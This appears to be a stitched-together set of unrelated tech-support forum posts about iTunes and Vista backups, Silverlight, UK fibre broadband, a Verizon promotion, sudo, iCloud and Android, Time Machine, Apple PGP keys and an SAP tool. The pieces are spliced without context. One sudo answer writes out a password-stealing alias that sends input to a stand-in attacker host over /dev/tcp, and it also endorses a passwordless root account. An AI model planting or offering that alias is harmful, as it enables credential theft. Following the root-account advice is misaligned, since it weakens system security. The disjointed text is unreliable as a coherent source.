I have a Western Digital external harddrive, and backed up my C drive a couple weeks ago. Yesterday, I "restored" my laptop to factory - and just finished downloading itunes 8. How do I tell itunes where my music is? When I open itunes and log in, it shows me about 15 songs (instead of 5,000) - the samples which originally came on my computer. I've been searching for a similar topic, but am not seeing how to address this. I would think since I have a backup, it should be fairly easy. Does itunes say something like "Would you like to FIND your music now?" Yikes.

Vista should be able to restore from the backups, although looking at the interface at *Start Menu > Accessories > System Tools > Backup Status and Configuration* reveals everything I hate about Vista - there is only an option for an automatic backup, no folder level control over what to backup (or restore?). It's a complete waste of time.
I prefer mirroring my files for the simple reason that it is much easier to restore one, many, or all files, whenever you want to, using the native file system. I have to say, frustrating as iTunes is, I think the real culprit here is Windows Vista for giving you the illusion that it's backup system would let you service the PC & then restore your data.
Anyway, back to getting at your data. I've just found this article which explains that Vista backs up into a VHD file format rather than the .BAK files used in earlier versions of Windows. Read the article, but the gist seems to be:-
Install Microsoft Virtual PC.
Build a virtual Windows machine inside Virual PC. (Use XP if you have a copy)
Connect the VHD files to the Virtual PC.
Connect a folder in your "real" computer as a virtual drive in the virtual machine.
Copy files from the backup to the virtual drive.
You now have access to the files in your main computer.
You say it's made 156 backup files though (is this just for iTunes?) which doesn't seem to tally with what I'm reading about Vista backup. Were the backups from Vista or have you installed Vista and are now unable to access backups from the previous system? There is an NT BACKUP-RESTORE utility (link in article) if this is the case. Otherwise can you post details of the file format/extension for these files.

I just downloaded something called Silver Light browser. I run XP on VMWear so I know it’s a Windows browser... But I didn’t know what it was going to do on my Mac - so I downloaded it...
So my question is: where is it and what’s going to happen etc... should I get rid of it?

Silverlight is not a browser, it's a browser extension for both Mac and Windoze--a competitor to Adobe's Flash technology. It would be wherever you have your browser set to download items (many people choose their Desktop for those).
Once you know you have the correct version for your Mac, you need to install it, then restart your browser to be able to see Silverlight content. Check this link for more info: Silverlight.

Connect your phone to iTunes, then right-click on the name of your phone on the left sidebar and select Reset Warnings. Then sync again and you should get a warning listing the problem files.

Are you referring to the message that says your startup disk is full? If so, you need to delete some files from the hard drive, or get a larger hard drive. Moving some files to an external hard drive is a quick and easy solution. Note that you should avoid the temptation to use various utilities to clean up your system or remove parts (like unused languages). That will not free up much space and can easily result in damaging your system.

Where Do I Look to See What Version of iTunes I'm Running?

OK, probably a simple, simple answer (and perhaps a dopey question!) -- but where do I look to see what version of iTunes I'm running? I've looked in obvious places (on every tab in my itunes library, right clicked on itunes tab on desktop and checked properties). I actually have no clue as to what version I'm running.
Also, I'm debating about updating (uh, NO not to 7.7. or 7.7.1) but to an older version. Does anyone know what older version worked w/out all the 'bugs'? I've seen 7.6.something listed many times and folks saying that version worked great until they updated to 7.7. Did this version work ok? Thanks again.

Any way to conjur up this box? When I plug in my ipod, it just brings up the registration page. I click 'register later', and the page stays. I click 'never register' and the page stays. I click 'continue' and fill out information and click 'submit' and that last page just stays. It won't even let me cancel out of the page and just bring up my summary page. I'd gladly never see this message again but how do I do that?

Yes your cabinet 10 on the Crediton exchange has already been installed and linked with a FTTC DSLAM cabinet (making it able to provide FTTC fibre broadband) and has been Accepting FTTC orders since December 2013. PCP10 (with it's DSLAM cabinet within 100meters of it) is locate on the junction of Commercial Road and the A3072.
However by the looks of things your are just too far away to obtain a FTTC (VDSL2) connection, meaning FTTC fibre broadband is not available to you.

Can You Offer Clarity - Who, What, When Your Eligible for Promotional Refund

In our town we have two retailers which are literally blocks mile from each other; Verizon Wireless 76 Dodge St., 01915 and Verizon Wireless at 136 Dodge St., 01915. I'm sifting through the VWZ website to better understand the promotion and to better understand given the information shared at "Verizon Wireless 136 Dodge St....".
I've been a customer of VWZ for years and have opted not to go to 76 Dodge St. given the years of poor customer service experience at that particular location and return to 136 Dodge St given their great customer service. Now I read your posting as I comb through the readings to learn more about the promotion to help better understand who, what and under what circumstances you are eligible to receive the promotional upgrade.
I only went to the store today given the VWZ website did not allow me to change my plan to from nationwide to single place and pre-order the phone. My frustration mounted when I went to the store I was at today stated VWZ "misinformed the public..." and the $200 upgrade really should really have read, "...receive up to a $200 refund..." -- that is, I would only receive the cost of the appraised value of the iPhone 4S which is only know after I submit the item to VWZ. Here I read this post which you indicate it's only available at "Verizon Wireless" which leaves be baffled - does this include authorized retailers who print receipts stating "Verizon Wireless, 136 Dode St... or what? The only reason why I remained with VMZ (it wasn't for the customer service), was the promotional offer and the new single plan being offered. If this is not the case, I like to void this order (which I won't be surprised I'll be charged) and start shopping around at other carriers. I admit this promotional offering is very clear with no clear indication on who, what and under what circumstance you are eligible and the cost you will encounter.

I think NOEXEC is the sudo option you're looking for. It prevents sudo processes from spawning child processes, which may or may not be a shell. Use it in conjunction with a specific, known-to-be-secure command line, and you can mitigate the problem you're talking about. Personally, I don't use su nor sudo anymore. Instead I log into my passwordless root account from another TTY, which getty permits by default. su and ssh deny access to passwordless accounts, so I don't really see it as a security problem.
Furthermore, I think your concern is misplaced: if someone had access to your user password, there is far more he or she could do beyond using sudo (install a keylogger, alias sudo='read -p Password > /dev/tcp/attacker.com/1234', gdb(1), ptrace(2), etc). More realistic threats are usually those involving privilege escalation by other users or programs without the use of su/sudo.

Well in that case...I would hope it was cached in the browser...did you look at objects in the cache in (Tools, Internet Options....) in IE?

I think that the tech probably meant that your photos would be in the backup. If he helped you backup your iPad on your computer, then you have to restore from the backup in order to recover your photos.
Did you bring your computer with you when you got this help from the tech backing up your iPad, or did he talk you through this over the phone?

Where does iCloud look for photos on my android phone?

I can't seem to find a good or direct answer to this question. Every time I plug in my android phone with USB storage enabled, iCloud for Preview opens with an additional Import window. It can't seem to find my pictures on my phone. So what folder is it looking for so I can get that fixed? It is very frustrating, especially since no one seems to know the answer, so please help!

Hi Carolyn and thanks for your reply. I know that iCloud is only for i-devices, but I guess I didn't explain my problem correctly.
When I plug my rooted android phone with pictures on it into my MacBook Pro laptop, iCloud automatically opens and wants to import the pictures but displays no results (no pictures found).
When my roommate plugs his unrooted android phone into the laptop, iCloud again launches and opens the Import window and finds the pictures on his phone and displays them, ready to import them.
I don't see why his works and mine won't. Frustrated here. Any suggestions? Thanks in advance!

Where do I look for all my photos?

When I enter TM, if I click on Pictures under Places the window that opens shows iPhoto Library under an icon with a sunset picture that resembles the iPhoto symbol in the dock. When I click on that, a window opens that gives information about the latest modification date. Where do I look for the actual photos?

That doesn't sound good. Where are your backups (external disk, Time capsule, etc.)? How big is the +iPhoto Library+ on your internal HD?
You might try doing a +*Repair Disk+* (not permissions) on your TM drive/partition via Disk Utility (in your Applications/Utilities folder).
If that doesn't help, take a look at your logs for the time you were trying to see the photos. Use the Console app (same place) to see if there are any messages indicating a problem.
When it starts, click +Show Log List+ in the toolbar, then navigate in the sidebar that opens up to your system.log and select it. Navigate to the time that you noted above, then see what follows that might indicate some sort of *error, failure, throttling respawn, termination, exit,* etc. (many of the messages there are info for developers, etc.). If in doubt, copy and post (a reasonable amount of) the log here.

Your question is somewhat terse, and I might infer you're conflating the PGP key used for Apple security-related email communications with cryptographic hashes (message digests) used to verify the integrity and the origin of files, and with digitally-signed binaries. While these areas are somewhat related, details vary. (If you're already familiar with this stuff, my apologies.)
The Apple PGP key is used to sign (verify) messages from the security folks at Apple, and can be to encrypt messages sent to the Apple security folks. See this Apple Security PGP web page for details on using the PGP key for message verification and for message encryption.
File downloads are implemented differently, and will generally involve a particular cryptographic hash or message digest (and not necessarily a PGP key), and what might be used used varies by the particular website and the download involved, with some sites using the older and insecure MD5, and with others increasingly using some variation of the less-insecure SHA cryptographic hash. Depending on the scheme used, these can protect against corruptions, or can also be used to sign the binaries. The system that Apple is encouraging developers to use is called Developer ID.
Shell commands used and useful here include md5 and various openssl commands for the sha hashes/digests.

I was just reviewing an ASUG presentation from Soledad Alvarado Ganzhorn of SAP NetWeaver Product Management at SAP Labs. It describes a value lifecycle manager tool that includes:

Is anyone aware if SAP is using this tool already? Will customers get access to it? This sounds like a replacement for the business case builder which I haven't seen either. It would be nice if customers had access to these sorts of discovery tools. Since we don't utilize SAP consulting, we are often not able to access this content as we initiate new initiatives. It would be nice to have access as it seems like we are internally selling their software for them.
